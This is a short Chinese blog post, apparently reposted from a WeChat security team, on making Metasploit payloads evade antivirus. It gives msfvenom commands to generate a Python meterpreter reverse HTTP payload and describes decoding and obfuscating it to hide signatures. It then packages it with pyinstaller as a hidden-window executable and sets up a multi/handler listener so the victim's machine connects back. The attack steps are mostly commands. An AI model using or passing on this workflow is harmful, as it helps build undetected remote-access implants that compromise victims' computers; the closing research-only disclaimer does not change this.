技术分享 | Msf免杀思路分享

admin 2022年8月7日00:36:03评论32 views字数 625阅读2分5秒阅读模式
技术分享 | Msf免杀思路分享


1

Part.1

首先


我们打开终端输入此项命令生成python文件用来上线MSF

msfvenom -p python/meterpreter_reverse_http LHOST=<IP> LPORT=<port> - f raw -o msf.py


然后我们打开py文件后可以看到py代码

技术分享 | Msf免杀思路分享


现在就可以复制里面的base64代码进行解密

技术分享 | Msf免杀思路分享


这样我们就拿到了里面的python代码内容

技术分享 | Msf免杀思路分享


然后我们就可以对python代码进行修改,加密,混淆等操作,来隐藏自己的特征

技术分享 | Msf免杀思路分享


这个呢就是我修改过后的⼀个python代码

然后呢我们就可以把代码打包为可执行文件尝试免杀效果了

pyinstaller -F -w msf.py


上面的pyinstaller是python打包的⼀个⼯具用来把python文件打包为exe的工具

-F参数就是生成单个可执行文件

-w参数就是不让其显示DOS窗又

然后就可以看到以下的信息

技术分享 | Msf免杀思路分享


我们现在进入dist文件夹下找到msf.exe文件

技术分享 | Msf免杀思路分享


2

Part.2

这就是我们的成品了哦



现在我们打开msf来连接

msfconsole



技术分享 | Msf免杀思路分享


紧接着依次输入下面命令

use exploit/multi/handlerset payload python/meterpreter_reverse_httpset lhost <IP>set lport <PORT>run



技术分享 | Msf免杀思路分享


此时目标机器运行我们的exe就会上线

技术分享 | Msf免杀思路分享


此时我们执行⼀些命令

技术分享 | Msf免杀思路分享



技术分享 | Msf免杀思路分享


THE

END


思路就分享到这里,大家也加油哈!

技术分享 | Msf免杀思路分享



原文始发于微信公众号(寻云安全团队):技术分享 | Msf免杀思路分享

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月7日00:36:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   技术分享 | Msf免杀思路分享https://cn-sec.com/archives/1222861.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息